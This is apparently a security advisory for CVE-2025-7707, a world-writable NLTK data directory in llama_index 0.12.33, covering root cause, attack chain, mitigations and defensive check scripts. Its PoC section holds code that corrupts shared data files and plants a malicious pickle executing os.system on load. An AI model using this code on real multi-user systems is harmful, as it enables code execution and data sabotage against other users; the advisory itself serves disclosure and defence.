CVE-2025-7707: Improper permissions on the llama_index NLTK data directory allow local privilege escalation and data tampering

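Vulnerability Information

CVE ID: CVE-2025-7707
Vulnerability type: Insecure permission configuration / local privilege escalation / data tampering
CVSS score: 7.8 (High)
Attack vector: Local (AV:L)
Privileges required: Low (PR:L)
User interaction: None (UI:N)
Affected product: run-llama/llama_index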

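Overview

CVE-2025-7707 is a high-severity vulnerability in version 0.12.33 of the llama_index library. When llama_index initializes its NLTK (Natural Language Toolkit) component, it sets the default NLTK data directory to a subdirectory of the codebase rather than a user-specific directory. In multi-user environments (such as a shared Linux server or a shared development host), that subdirectory is world-writable, so any local user can read, modify, delete, or replace the NLTK data files stored in it.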

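The vulnerability was found and disclosed by a security researcher through the huntr bug bounty platform. Its CVSS 3.1 score is 7.8 (High). The attack vector is local (AV:L), and the attacker needs only low privileges (PR:L) and no user interaction (UI:N). A successful attacker can tamper with NLTK data files, causing denial of service or data corruption, and in specific scenarios privilege escalation. For example, the attacker can plant malicious NLTK data files (such as a malicious tokenizer model or corpus) in the shared directory; when another user or a privileged process later uses llama_index, it loads the malicious data, which can lead to code execution or disclosure of sensitive information.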

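The underlying problem is the use of a shared cache directory instead of a per-user cache directory (such as ~/.cache/nltk_data), which violates the principle of least privilege. Because llama_index is a widely used framework for building LLM applications, its security directly affects a large number of downstream applications, so the impact of this issue should not be underestimated. The maintainers fixed it in commit 98816394d57c7f53f847ed7b60725e69d0e7aae4, and users are advised to upgrade to a fixed version as soon as possible.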

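Technical Details

The root cause is the way llama_index 0.12.33 hard-codes the NLTK data path. NLTK is a core Python library for natural language processing; its data files (tokenizers, corpora, trained models, and so on) are downloaded to and loaded from the directories listed in nltk.data.path. When integrating NLTK, llama_index set the NLTK data search path to a subdirectory inside its own codebase (for example ./nltk_data or a similar path) instead of a standard per-user directory (such as ~/.local/share/nltk_data or ~/nltk_data).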

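On a multi-user Linux system, the exposure depends on the permissions the subdirectory ends up with. Under the common umask of 022 a newly created directory gets drwxr-xr-x (755), which other users can read but not write. The directory becomes writable by every local user when it ends up with looser permissions such as drwxrwxrwx (777), for example under a permissive umask or after an explicit chmod. In that case an attacker can proceed as follows: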

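1. The attacker logs in to the multi-user system as an ordinary user and locates the NLTK data subdirectory under the llama_index installation directory.
2. Using the write permission, the attacker plants malicious NLTK data files in that directory, such as a malicious pickle file (unpickling untrusted data in Python can execute arbitrary code) or a tampered corpus file.
3. When another user on the system (in particular a privileged user, or a service process running a llama_index application) uses llama_index for text processing, NLTK loads its data files from the shared directory.
4. Once the planted or altered files are loaded, the attacker can cause denial of service (deleting or corrupting key data files so the program crashes), data tampering (changing tokenization results and thereby the output of downstream AI applications), or privilege escalation (arbitrary code execution through mechanisms such as pickle deserialization).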
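Whether a newly created directory is world-writable depends on the umask of the process that creates it. The following is a minimal sketch for checking this on a POSIX system; it is not taken from llama_index, and the helper name mode_under_umask and the directory name nltk_data are illustrative assumptions.

```python
import os
import shutil
import stat
import tempfile


def mode_under_umask(umask: int) -> int:
    """Create a directory requesting mode 0o777 under `umask`; return its rwx bits."""
    parent = tempfile.mkdtemp()
    old = os.umask(umask)  # note: the umask is process-wide state
    try:
        target = os.path.join(parent, "nltk_data")
        os.mkdir(target, 0o777)  # the requested mode is filtered by the umask
        return os.stat(target).st_mode & 0o777
    finally:
        os.umask(old)  # always restore the previous umask
        shutil.rmtree(parent, ignore_errors=True)


if __name__ == "__main__":
    for mask in (0o022, 0o002, 0o000):
        mode = mode_under_umask(mask)
        writable = bool(mode & stat.S_IWOTH)
        print(f"umask {mask:03o} -> mode {mode:03o}, world-writable: {writable}")
```

On a typical Linux filesystem, umask 022 yields mode 755 (not world-writable) and umask 000 yields mode 777 (world-writable), which is the condition the attack steps above rely on.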

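The fix is to place the NLTK data directory in a user-specific location, or to create the directory with strict permissions (such as 0700) so that only the current user can read and write it.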
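The idea behind the fix can be sketched in a few lines. This is an illustration under stated assumptions, not the code from the upstream commit: the function name ensure_private_data_dir is hypothetical, and the sketch is POSIX-only because it relies on os.getuid.

```python
import os
from pathlib import Path


def ensure_private_data_dir(path: Path) -> Path:
    """Create `path` if needed and restrict it to the owning user (mode 0o700)."""
    path.mkdir(parents=True, exist_ok=True)
    st = path.stat()
    # Refuse a pre-existing directory that belongs to someone else.
    if st.st_uid != os.getuid():
        raise PermissionError(f"{path} is owned by uid {st.st_uid}, not the current user")
    # mkdir's mode argument is filtered by the umask and ignored for existing
    # directories, so set the permissions explicitly.
    os.chmod(path, 0o700)
    return path


# Example usage (left as comments so that importing this sketch has no side effects):
#   data_dir = ensure_private_data_dir(Path.home() / ".cache" / "nltk_data")
#   import nltk
#   nltk.data.path.insert(0, str(data_dir))  # search the private directory first
```

Calling os.chmod after mkdir matters because an existing directory keeps whatever mode it already had, so a directory that was previously 777 is tightened rather than silently reused.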

Attack Chain Analysis

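Step 1: Reconnaissance

On a multi-user system, the attacker locates the llama_index installation directory and identifies the world-writable NLTK data subdirectory inside it (for example ./nltk_data). Checking the permission bits (mode & 0o002) confirms that the directory is writable by other users.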
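The same permission-bit check is useful to defenders who want to audit their own hosts. The sketch below is a minimal example, assuming a hypothetical helper named world_writable_dirs that receives the candidate paths from the caller; it uses only the standard library.

```python
import os
import stat
from typing import Iterable, List


def world_writable_dirs(paths: Iterable[str]) -> List[str]:
    """Return the existing directories in `paths` that have the others-write bit set."""
    flagged = []
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue  # skip entries that are missing or cannot be inspected
        # stat.S_IWOTH is the 0o002 bit mentioned above.
        if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
            flagged.append(p)
    return flagged


# Example usage, if NLTK is installed:
#   import nltk
#   print(world_writable_dirs(nltk.data.path))
```

Passing nltk.data.path covers every directory NLTK will search, not only the one inside the llama_index package.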

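Step 2: Permission Verification

As a low-privileged user, the attacker verifies write access to the target directory, confirming that files in it can be created, modified, and deleted without any elevated privileges.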

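Step 3: Payload Planting

The attacker places malicious files in the shared NLTK data directory. These can be corrupted data files (causing denial of service) or malicious pickle files (achieving code execution when Python deserializes them).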

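Step 4: Triggering the Load

When another user or a privileged service process on the system uses llama_index for text processing, NLTK loads its data files from the shared directory, and the malicious payload is triggered during loading.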

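Step 5: Privilege Escalation or Data Destruction

If a malicious pickle file is loaded, the attacker can execute arbitrary code in the context of the privileged process and thereby escalate privileges. If the data files are only corrupted, the result is denial of service or tampered AI application output, which affects downstream business systems.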

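PoC / Exploit Code

⚠️ For security research only

The following code is intended solely for security research and authorized testing. Unauthorized use is illegal.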

# CVE-2025-7707 PoC - llama_index NLTK Data Directory Tampering
# This PoC demonstrates how a local attacker can exploit the world-writable
# NLTK data directory in llama_index 0.12.33 to tamper with shared data files.

import os
import nltk

# Step 1: Locate the vulnerable llama_index NLTK data directory
# The vulnerable version sets the NLTK data path to a subdirectory within
# the llama_index codebase (e.g., ./nltk_data) instead of a user-specific path.
def find_vulnerable_nltk_dir():
    """Find the world-writable NLTK data directory used by llama_index."""
    import llama_index
    # llama_index may be a namespace package, in which case __file__ is None;
    # __path__ lists the package directories in either case.
    for pkg_path in llama_index.__path__:
        candidate_dirs = [
            os.path.join(pkg_path, "nltk_data"),
            os.path.join(pkg_path, "data", "nltk_data"),
        ]
        for d in candidate_dirs:
            if os.path.isdir(d):
                # Check if directory is world-writable
                mode = os.stat(d).st_mode
                if mode & 0o002:  # world-writable bit
                    print(f"[+] Vulnerable world-writable directory found: {d}")
                    return d
    return None

# Step 2: Demonstrate data tampering (DoS / integrity attack)
def tamper_nltk_data(target_dir):
    """Overwrite or corrupt NLTK data files in the shared directory."""
    for root, dirs, files in os.walk(target_dir):
        for f in files:
            filepath = os.path.join(root, f)
            try:
                # Corrupt the data file by overwriting with garbage
                with open(filepath, "wb") as fp:
                    fp.write(b"\x00" * 1024)
                print(f"[!] Corrupted: {filepath}")
            except PermissionError:
                print(f"[-] Permission denied: {filepath}")

# Step 3: Plant malicious pickle payload (potential RCE via deserialization)
def plant_malicious_pickle(target_dir):
    """Plant a malicious pickle file that executes code upon loading."""
    import pickle
    class MaliciousPayload:
        def __reduce__(self):
            # Benign marker command for demonstration; it runs when the file is unpickled
            return (os.system, ("echo 'PWNED by CVE-2025-7707'",))

    payload_path = os.path.join(target_dir, "tokenizers", "punkt", "malicious.pickle")
    os.makedirs(os.path.dirname(payload_path), exist_ok=True)
    with open(payload_path, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    print(f"[!] Malicious pickle planted at: {payload_path}")

# Step 4: Verify the NLTK search path includes the vulnerable directory
def check_nltk_search_path():
    """Verify that the vulnerable directory is in NLTK's search path."""
    print("[*] Current NLTK data search paths:")
    for p in nltk.data.path:
        print(f"    - {p}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-7707 - llama_index NLTK Directory Tampering PoC")
    print("=" * 60)

    check_nltk_search_path()

    vuln_dir = find_vulnerable_nltk_dir()
    if vuln_dir:
        print(f"\n[*] Exploiting vulnerable directory: {vuln_dir}")
        # Uncomment the desired attack:
        # tamper_nltk_data(vuln_dir)      # DoS / data corruption
        # plant_malicious_pickle(vuln_dir) # Potential RCE
    else:
        print("[-] No vulnerable directory found. System may be patched.")

Affected Versions

run-llama/llama_index == 0.12.33

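Defense Guide

Temporary Mitigations

If you cannot upgrade immediately, manually restrict the permissions on the llama_index NLTK data directory so that only its owner can access it (chmod 700), or point the NLTK_DATA environment variable at a user-specific directory. On multi-user systems, also restrict ordinary users' write access to the llama_index installation directory and monitor the NLTK data directory for unexpected file changes.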
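Monitoring for unexpected file changes can be approximated with a hash baseline. The sketch below is one possible approach using only the standard library; the function names snapshot and diff_snapshots are hypothetical, and the baseline is assumed to be stored somewhere that untrusted local users cannot write to.

```python
import hashlib
import os
from typing import Dict, List


def snapshot(root: str) -> Dict[str, str]:
    """Map each file under `root` (by relative path) to its SHA-256 hex digest."""
    digests: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                # Read in chunks so large model files are not held in memory.
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root)] = h.hexdigest()
    return digests


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files that were added, removed, or modified since the baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(k for k in common if baseline[k] != current[k]),
    }
```

A baseline taken right after a trusted install can be compared against a fresh snapshot on a schedule; any non-empty list in the result is a reason to inspect the directory before the data is loaded again.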